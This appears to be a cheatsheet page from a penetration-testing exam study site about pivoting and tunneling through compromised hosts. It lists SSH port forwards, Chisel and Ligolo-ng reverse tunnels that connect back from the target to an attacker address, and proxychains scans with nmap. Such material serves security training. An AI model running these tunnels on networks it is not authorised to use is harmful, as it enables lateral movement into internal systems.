Pivoting, Tunneling & Port Forwarding
Post-Exploitation
Overview
Techniques to access internal networks through compromised hosts.
2
Exercises
3
Flashcards
1
Mind Maps
Cheatsheet
SSH Tunneling
ssh -L 8080:10.10.10.6:80 user@10.10.10.5 # Local port forward (access remote service locally) ssh -D 9050 user@10.10.10.5 # Dynamic port forward (SOCKS proxy) ssh -R 8080:localhost:80 user@10.10.14.5 # Remote port forward (expose local service remotely)
Chisel
# Server chisel server --reverse -p 8000 # Start Chisel server on attacker # Client chisel client 10.10.14.5:8000 R:socks # Connect from target to create SOCKS tunnel
Ligolo-ng
# Proxy ./proxy -selfcert # Start Ligolo proxy interface # Agent ./agent -connect 10.10.14.5:11601 -ignore-cert # Connect Ligolo agent from target
Proxychains
proxychains nmap -sT 10.10.10.6 # Scan through proxy (must use TCP connect scan)
Command Examples
Common Pitfalls
- Forgetting to use -sT with proxychains
- Not updating proxychains.conf
Exam Survival Tips
- Ligolo-ng is faster than chisel
- Double-check pivot routes